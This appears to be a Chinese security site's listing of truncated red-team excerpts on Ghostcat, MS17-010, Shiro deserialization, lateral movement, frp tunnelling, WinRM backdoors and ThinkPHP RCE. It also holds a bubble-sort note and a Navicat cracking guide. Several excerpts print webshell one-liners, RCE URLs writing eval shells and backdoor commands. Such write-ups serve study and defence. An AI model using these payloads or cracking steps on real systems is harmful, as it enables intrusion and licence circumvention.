红队攻击面相关讨论

一、漏洞描述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）. 二、危险等级 高危 三、漏洞危害 攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害 四、影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 五、前提条件 对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomc…

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb …

巡风简介 巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统，通过搜索功能可清晰的了解内部网络资产分布情况，并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。其主体分为两部分：网络资产识别引擎与漏洞检测引擎。 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测（支持调用MASSCAN），并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测，其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。（转自https://github.com/ysrc/xunfeng） 安装Ubuntu就不说了，说下国内的比较快的源吧，省的网速不好，只能干等 Ubuntu 17.04的开发代号是Zesty Zapus，以下是Ubuntu 17.04网易源： sudo nano /etc/apt/source.list deb http://mirrors.163.com/ubuntu/ zesty main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-security main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-updates main restricted universe multiverse deb http://mi…

0x00 漏洞描述Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令只要rememberMe的AES加密密钥泄露，无论shiro是什么版本都会导致反序列化漏洞。0x01 影响版本Apache Shiro <= 1.2.40x02 漏洞原理Apache Shiro框架提供了记住我的功能（RememberMe），关闭了浏览器下次再打开时还是能记住你是谁，下次访问时无需再登录即可访问。用户登陆成功后会生成经过加密并编码的cookie。Apache Shiro 1.2.4及以前版本中，Apache Shiro默认使用了CookieRememberMeManager，其处理cookie的流程是：得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞在服务端接收cookie值时，按照如下步骤来解析处理： 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作（未作过滤处理） 但是，AES加密的密钥Key被硬编码在代码里，意味…

0x00 写个开头凑字数这次攻防打的还是比较有意思的，开局电脑摆烂恼火的很，最后没电脑只能拿着销售的电脑疯狂输出。 去拿电脑没一会的功夫我们的私有目标就被干出局了，这次的规则还是有点问题按系统分给各个队伍，不是按照目标单位分的，别人分到我们私有目标的部分系统基础分和数据分薅完一下被干出局了，后面再打只有100路径分，还有老6盯着我们的私有目标打，有个泛微office的洞我们手上没有，目标一放出来就穿了，怪自己太菜了。 排名最后还算理想吧最终排名第三，跟两个技术大哥没后端支撑的情况排到前三还是可以的，前面两位重量级选手卷不过啊，一个提交0day另外一个后端支撑有名的卷，最后前两名分数比我们高出一半多。 废话讲完了，开始我们的内容，码打的严师傅们勿怪，文章最后欢迎师傅们留下评论来交流。 0x01 目标某医院外网弱口令第一天分了私有目标和公共目标，这个目标是公共池目标，运气也是比较好外网一个弱口令直接进去了，主要就是要知道IP地址，突破到内网这里没啥技术含量，目标给的是一个官网的地址，估计其他队伍的师傅们都去冲云上官网那个IP了，后面云上的我们也通过信息科专用共享服务器上密码文件拿到了所有权限。 攻击路径 下面我会按照上面图上标记的序号说明内网攻击过程 路径1/路径2 外网弱口令这里说下这个目标IP怎么来的，通过IP地址收集C段信息找到h3c设备，默认审计账号密码登陆上去命令控制台查看对应授权信息确定是目标IP地址，但是审计账号没有配置权限没法做vpn隧道这些，所以做了个全端口扫描发现一个非标准端口的ssh弱口令，这里拿到服务器权限后我先做了…

1. 根据网卡获取的网段信息，对win7所在网段来一波存活主机检测，排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口，并且是一个域用户┌──(root💀kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Wi…

密码学简介密码学（Cryptography）一般可分为古典密码学和现代密码学。 其中，古典密码学，作为一种实用性艺术存在，其编码和破译通常依赖于设计者和敌手的创造力与技巧，并没有对密码学原件进行清晰的定义。其主要包含以下几个方面 单表替换加密多表替换加密奇奇怪怪的加密方式而现代密码学则起源于 20 世纪末出现的大量相关理论，这些理论使得现代密码学成为了一种可以系统而严格地学习的科学。现代密码学又可以简单的分为以下几个方面 对称密码，以 DES，AES，RC4 为代表。非对称密码，以 RSA，椭圆曲线加密为代表。Hash，以 MD5，SHA1，SHA512 等为代表。数字签名，以 RSA 签名，ElGamal 签名，DSA 签名为代表。其加密方式主要有两种方式 块加密流加密一般来说，密码设计者的基本想法是确保密码框架的 保密性完整性可用性不可否认性其中，前三者又称为 CIA 三元组。 而对于密码破解者来说，一般都是要想办法识别密码算法，然后利用暴力破解方法或者密码框架的漏洞进行破解。当然，也有可能是处于希望构造虚假的哈希值或者签名来绕过相应的检测。 一般来说，我们都会假设攻击者知道要攻破的密码体制，一般来说会有如下几种攻击类型， 攻击类型说明适用场景唯密文攻击攻击者只拥有密文古典密码已知明文攻击知道明文和对应的密文古典密码，对称密码，非对称密码选择明文攻击能够对选择一些明文加密后获得其相应的密文对称密码，非对称密码选择密文攻击能够对选择一些密文解密后获得明文非对称密码这里推荐一些资料 可汗学院公开课深入浅出密码学——常用加密技术原理与应用参…

20231206085712722.doc 下载 doc文件 262.3K

0x01 渗透测试过程通过渗透网站拿到webshell，然后通过webshell拿到网站主机系统权限，发现受害主机有两张网卡，另一张网卡下有两台存活的内网主机，然后我们就尝试渗透存活的内网主机看能不能拿到系统权限，最后发现两台内网主机都开启了445端口，然后搜索了一下445端口漏洞发现有个最新的m17_010可能可以利用，结果真的通过ms17_010成功获得了内网主机的权限。 目标网站ip：192.168.31.196 浏览网站通过手工测试发现http://url/hr/hr.php?hrid=15处有注入点 尝试利用sqlmap工具跑一下这个注入点，看能不能注出有用的信息 通过测试发现这个注入点果然可以进行注入 然后利用该注入点进行尝试注出网站后台登录账号密码 发现跑出来的网站后台密码是用md5加密的，所以利用md5解密一下，发现只有两个权限较低的密码可以解密，而权限较高的admin账号解不开。不过问题不大，先用登录后台（后台登录界面可以用御剑跑出来）看一下 利用御剑跑出的后台目录里有个phpinfo页面，说不定可以得到一些有用的信息 发现可以得到网站文件的绝对路径 发现网站后台数据维护处可以执行sql语句，通过phpinfo页面知道了网站绝对路径，可以尝试在此处写入php一句话木马 select "<?php eval($_POST[123456]);?>" into outfile "/UPUPW_AP5.2/vhosts/jy.test.com/321.php" 发现可以执行成功 …

一、系统环境配置 系统环境：centos7x64 ip地址：172.16.91.130 1.设置静态IP地址 [root@localhost backlion]#vi /etc/sysconfig/network-scripts/ifcfg-* BOOTPROTO=static #dhcp改为static（修改） ONBOOT=yes #开机启用本配置，一般在最后一行（修改） IPADDR=172.16.91.130 #静态IP（增加） GATEWAY=172.168.91.1 #默认网关，虚拟机安装的话，通常是2，也就是VMnet8的网关设置（增加） NETMASK=255.255.255.0 #子网掩码（增加） DNS1=172.16.95.70 #DNS 配置，虚拟机安装的话，DNS就网关就行，多个DNS网址的话再增加（增加） [root@localhost ~]# /etc/init.d/network restart 设置DNS: Vim /etc/resolv.conf nameserver=114.114.114.114 nameserver=8.8.8.8 2.设置主机名 [root@localhost network-scripts]# hostnamectl set-hostname selks-server.com vim /etc/hosts最后加上你的IP与主机名的绑定 127.0.0.1 localhost localhost.localdomai…

0x00 场景 本次目标是获取“ redhook.DA”域中帐户的一个可用凭据。从一个控制内网主机的权限开始，但尚未与目标域控制器处于同一子网中。如下图所示： 此外，假设攻击者获取了client 1主机中的本地管理员缓存认证凭据。通常，如果网络范围足够大，将通过批处理，vbs，.NET，ps1等脚本在网络共享上找到相应的存储的有效凭据。以获得初始访问权限。在这篇文章中，本次攻击者为在kali主机上，重点讲述在Windows上横向移动的方法以及不包括绕过AV的情况。 0x00 攻击clicent1主机 1.批处理脚本获取 如上所述。通过网络共享上的批处理及脚本获取了clent1（10.0.0.129）主机的用户认证凭据： # Mock contents of \\FileServer\Users\bob\Workstations\ErrorLog.bat @echo off net use "\\10.0.0.129\C$" /user:bob ImSoSecur3! #建立共享 if exist "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" ( echo "Sigh, more errors on Client1! Copying.." copy "\\10.0.0.129\C$\Program Files\MSBuild\ErrorLog.txt" C:\Users\bob\Logs\Client1\ del "\\10.0.…

前言 英文题目为了校准谷歌和必应的搜索,谷歌和必应也都会把本站的每篇文章都收录 Foreign friends please use Google Translate plugin to translate this article for better viewing allow_url_fopen allow_url_include等函数导致文件包含漏洞 file_get_contents函数导致目录遍历 除了SSRF的靶场没打,文件包含和xss在ctfshow和xsshaozi打了 也在补天那里提交了几个xss存储型低危的洞 room:https://tryhackme.com/room/fileinc 笔记 笔记： /etc/issue 包含在登录提示之前打印的消息或系统标识。 /etc/profile 控制系统范围的默认变量，例如 导出变量、文件创建掩码 (umask)、终端类型、指示新邮件何时到达的邮件消息 /proc/version 指定Linux内核的版本 /etc/passwd 拥有有权访问系统的所有注册用户 /etc/shadow 包含有关系统用户密码的信息 /root/.bash_history 包含root用户的历史命令 /var/log/dmessage 包含全局系统消息，包括系统启动期间记录的消息 /var/mail/root root用户的所有电…

前言 RCE命令执行(可看前面发布的ctfshow的靶场)已打,ctfshow给的命令执行比较直接一点,相对于Thm打一遍再次巩固基础 自己现在的实力还是很菜 Foreign friends please use Google Translate plugin to translate this article for better viewing room:https://tryhackme.com/room/oscommandinjection 笔记 了解RCE漏洞 任务三命令注入 任务四修复命令注入 下一关 Windows 拿flag Ok 开下一章节 SQL注入 room：https://tryhackme.com/room/sqlinjectionlm SQL（结构化查询语言）注入，通常称为 SQLi，是对 Web 应用程序数据库服务器的攻击，导致执行恶意查询。当 Web 应用程序使用未经正确验证的用户输入与数据库进行通信时，攻击者有可能窃取、删除或更改私人数据和客户数据，并攻击 Web 应用程序身份验证方法以获取私有数据。或客户区。这就是为什么 SQLi 不仅是最古老的 Web 应用程序漏洞之一，而且也可能是最具破坏性的。 在这个房间中，您将了解什么是数据库、什么是SQL以及一些基本的 SQL 命令、如何检测 SQL 漏洞、如…

冒泡排序作为初学者最常用的排序算法之一，大家应该闭着眼都能敲出来，但是如果在数据较大的情况下，冒泡排序的效率并不高，因为它的时间复杂度是O(n^2)，但是在我们又不会其它排序算法的前提下，怎么尽量给它优化一下呢，这就是今天要讲的内容。 首先先看普通代码 // 冒泡排序 void bubbleSort(int arr[], int n) { for (int i = 0; i < n - 1; i++) { for (int j = 0; j < n - 1 - i; j++) { if (arr[j] > arr[j + 1]) { int t = arr[j]; arr[j] = arr[j + 1]; arr[j + 1] = t; } } } } 它要一个个比较大小，然后从后面排到第一个，但是如果有几个数组是这样子的： arr[10]={1,2,3,4,5,6,7,8,10,9}; brr[10]={1,2,3,4,5,6,8,7,10,9}; 那是不是除了后面的那几个，其他的都排序好了呀，但是普通的冒泡排序还会继续比较前面的然后排序，这是不是使程序的效率更不高了，那有没有什么可以优化的地方呢，让我们排完后面的就结束排序呢？当然有的，请看代码： // 冒泡排序 void bubbleSort(int arr[], int n) { for (int i = 0; i < n - 1; i++) { …

做了不少qp（棋牌），BC渗透了，通宵了2个晚上干了几个盘子，简略的说下过程，做一下总结。 首先说一下qp， 以我的渗透成功案例来说的话首先信息收集必不可少的，qp的特点是什么呢？ 他的后台会在服务器域名的后面以不同的端口形式架设 如图： 关于端口可以发现，基础东西你们都懂。 切入点： 在app里面抓包，查找邮箱，充值，的地方寻找sql注入或者意见反馈的位置XSS 有一种情况是抓包显示127.0.0.1的 抓不到包的情况，这种情况多于大盘子，它不一定走的是TCP UDP协议。可以参考 T-ice 表哥说的 Proxifier全局代理 有了后台之后可以目录fuzz一下，有些管理员会有备份的习惯没准能有新发现。 相对来说qp还是挺简单的。 那么来说说BC吧，看个昨晚的渗透的案例。 基本上大型的BC盘子都是各种防护+cdn 标配，毕竟别人赚了那么多钱也不在乎这点设备钱。。。。 注册了个号 发现没地方能打XSS的。。。。。作罢 因为这种大盘子服务一般是挺到位的，牌面这块方方面面给你整的很高大上，什么导航啊，什么积分商城啊。。 乱七八糟的应有具有，在他主站一个VIP查询页面确定了一处sql注入，而且是thinkphp的框架 thinkphp3.2.3的 ，因为有CDN不知道真实IP，所以后台是个很麻烦的事情，本想着看看数据库里面的log有没有啥发现 没啥鸟用。。尝试读取日志文件，没有。 最后读取配置文件确定了一个很脑残的事情。。。 可能通宵了之后人的脑子有点僵。 我给忘了这种BC后台肯定都是分离的。。。。嗨。少熬夜。 于是。…

0# 什么是AWD 0.1# AWD赛制介绍 「 攻防模式 | AWD (Attack With Defense) 」 是 CTF比赛 「CTF Capture The Flag」 几种主要的比赛模式之一，该模式常见于线下赛。 在该模式中，每个队伍都拥有一个相同的初始环境 ( 我们称其为 GameBox )，该环境通常运行着一些特定的服务或应用程序，而这些服务通常包含一些安全漏洞。参赛队伍需要挖掘利用对方队伍服务中的安全漏洞，获取 Flag 以获得积分; 同时，参赛队伍也需要修补自身服务漏洞进行防御，以防被其他队伍攻击和获取 Flag。 主要特点为：强调实战性、实时性、对抗性，综合考量竞赛队的渗透能力和防护能力。 0.2# 比赛整体流程 赛前准备环节：我们会分配到多个靶机服务器，通常是分配给我们 SSH 或者 VNC 的用户名和密码，还有相关IP等信息 安全加固环节：我们需要先自己去登录靶机服务器，进行30分钟的安全加固（源码备份/弱口令修改/代码审计和修复/漏洞修复等） 自由攻击环节：安全加固时间过后，开始自由攻击环节，通过对别的队伍的靶机服务器进行攻击（弱口令/Web漏洞/系统漏洞等）获得Flag进行加分，对应队伍失分 1# 比赛环境 通常比赛环境有以下三种情况： 混合靶机情况：运维机器 Windows 10 + 攻击机 Kali Linux + Win靶机 Windows Server 2003/2008/2012 或者 Windows 7 + Linux靶机 Centos7.x 或者 Ubuntu 16.04/17.…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 本文内容按以下思维导图展开 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 frp(socks5)frp服务端配置文件 [common]bind_port = 8080 frp客户端配置文件 [common]server_addr = xx.xx.xx.xxserver_port = 8080#服务端口使用Web常见端口[socks5]type = tcpremote_port = 8088plugin = socks5use_encryption = trueuse_compression = true#socks5口令#plugin_user = SuperMan#plugin_passwd = XpO2McWe6nj3 此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密 [通信内容加密传输，有效防止流量被拦截] use_compression = true 启用压缩 [传输内容进行压缩，有效减小传输的网络流量，加快流量转发速度，但会额外消耗一些CPU资…

0x00 前言 关于众测、专属中如何去捡漏xss洞，水文，水文，水文！！！0x01 日常测试日常无聊测站点，当你在渗透测试时候，发现有某个html标签调用服务器内图片的，并且是那种加入服务器ip地址的，可以尝试通过修改host头来fuzz一下，探测下是否存在xss。 看到这种情况我们可以大概猜想一下，其中的后段代码可能是以下样子：<img src="<?php echo "http://{$_SERVER['HTTP_HOST']}/"?>xxx/aaa.png" />这样看来就很简单了，修改一下请求包中的host就能造成xss咯。 成功弹窗 捡破烂小tips完结。 转自原来链接：https://blog.csdn.net/Guapichen/article/details/124040935?spm=1001.2014.3001.5501

前言 Navicat可能是Mysql必备的工具了,不过域还是建议具备一些网站开发经验才能更好的学习. 其次今天不发Thm靶场,水一下文章 发一些之前用的工具的破解教程(抱歉 介绍一下Navicat Navicat Premium 是一套可创建多个连接的数据库开发工具，让你从单一应用程序中同时连接 MySQL、Redis、MariaDB、MongoDB、SQL Server、Oracle、PostgreSQL 和 SQLite 。它与 GaussDB 、OceanBase 数据库及 Amazon RDS、Amazon Aurora、Amazon Redshift、Amazon ElastiCache、Microsoft Azure、Oracle Cloud、MongoDB Atlas、Redis Enterprise Cloud、阿里云、腾讯云和华为云等云数据库兼容。你可以快速轻松地创建、管理和维护数据库。 但是Navicat是需要破解的,不然只能用14天接下来教大家如何破解 破解激活教程 先在官方下载Navicat Navicat | 下载 Navicat Premium 14 天免费 Windows、macOS 和 Linux 的试用版 破解软件下载地址NavicatCracker.exe_免费高速下载|百度网盘-分享无限制 (baidu.com) 破解思路： 把破解软件放到Navicat文件夹中 让后关闭防火墙和网络 全…

WEB ezphp 题目描述：一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统，以提高数据传输的效率和安全性，团队决定采用PHP 8.3.2来完善通信系统开发。 考点：php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考：https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2BxfOD7DloaGkWepSazHG%3D4D#toc-16 题目给出源码如下 <?php highlight_file(__FILE__); // flag.php if (isset($_POST['f'])) { echo hash_file('md5', $_POST['f']); } ?> 这里可以用的项目：https://github.com/synacktiv/php_filter_chains_oracle_exploit/ 考点：可用PHP Filter链-基于oracle的文件读取攻击生成exp执行，题目提示php版本号正好满足条件，下载exp进行利用 执行payload，这里可能需要多跑几次才可以 python3 filters_chain_oracle_exploit.py --target http://eci-2zea1zzp9231ugqw9htd.cloudeci1.ichunqiu.com/ --file flag.php --parameter f …

前言 房间地址：https://tryhackme.com/room/hackpark 使用 Hydra 暴力破解网站登录，识别并使用公共漏洞，然后升级您在此 Windows 计算机上的权限！ 建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机 看到是人入侵Windows 使用到了MSF，看经典好像是当年的永恒之蓝漏洞 实战 靶机地址：10.10.201.235 Hackpark的引入 小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑 有个联系,预测可能有XSS注入, 这里有个登录,那就是爆破了 我们看下 第一题： 九头蛇爆破账号密码 让后看第二题 Hydra 确实有很多功能，并且有许多可用的“模块”（模块的一个示例是我们上面使用的http-post-form ）。 然而，这个工具不仅适用于暴力破解 HTTP 表单，还适用于其他协议，如 FTP、SSH、SMTP、SMB 等。 下面是一个迷你备忘单： 命令描述Hydra -P <单词列表> -v <ip> <协议>对您选择的协议进行暴力破解Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1…

关于Mysql蜜罐的具体技术细节，网上文章介绍的太多了，大家可以自己从网上搜索文章，我写一个简介吧：mysql中有一个load data local infile函数能够读取本地文件到mysql数据库中。当攻击者用爆破mysql密码的扫描器扫描到我们的mysql并连接上的时候（注，这里我纠正一下，只要连接一下蜜罐mysql，就可以被蜜罐读取到本地配置文件，不需要提供正确的用户名密码），客户端（攻击者）会自动发起一个查询，我们（服务端）会给与一个回应，我们在回应的数据包中加入load data local infile读取攻击者的本地文件到我们数据库中，达到反制的目的。（以下图片来源于网络搜索） cs的配置文件明文存储密码只要是使用cs客户端连接过cs服务端的电脑，cs客户端都会在固定的文件夹下生成一个.aggressor.prop配置文件。如果是Windows系统，那么文件位置是：C:\Users\Administrator\.aggressor.prop，这个配置文件里面就包含了cs远控的ip地址、端口、用户名及密码，而且都是明文的！如下图所示： 每次打开cs都会显示出曾经登录后的ip地址、端口、用户名、密码等信息，这些信息都是存储在本地.aggressor.prop文件中的，大致内容如下图所示： 因此我们得到结论，搭建一个mysql蜜罐，一旦攻击者连接这个蜜罐，那么这个蜜罐利用msyql本地文件读取漏洞去自动读取C:\Users\Administrator\.aggressor.prop这个文件内容，蜜罐就可以成功得到攻…

一个学长前几天不幸在钓鱼网站中招被骗走一些资金，在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动 在对网站进行初步信息收集后发现网站使用ThinkPHP 5.0.7框架，直接找到ThinkPHP对应版本的Exp进行尝试： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=1 //执行phpinfo 成功弹出phpinfo，ThinkPHP的RCE漏洞没有修复，并且通过phpinfo可以看出服务器使用宝塔搭建，运行Windows系统，本想着接下来的事情就非常简单了，但是当我写Shell时遇到了困难： http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ye.php&vars[1][]=<?php eval($_POST['cmd']);?> 文件被成功写入，但是却直接输出在了页面中，查看源代码发现< >被转义为了HTML实体编码： 在尝试利用base64编码后再写入，发现依然被转义，直接命令执行试一试： http://www.hu*****.***/index.php?s=/ind…

前言 2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器（或远程共享）时，恶意二进制程序将在目标系统上执行攻击者选择的代码，成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 漏洞利用条件和方式: 远程利用 漏洞影响范围: Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version 1607 for x64-based Systems Microsoft Windows 10 for 32-bit Systems Microsoft Windows 10 for x64-based Systems Microsoft Windows 10 version 1511 for 32-bit Systems Microsoft Windows 10 version 1511 for x64-based Systems Microsoft Windows 10 version 1703 …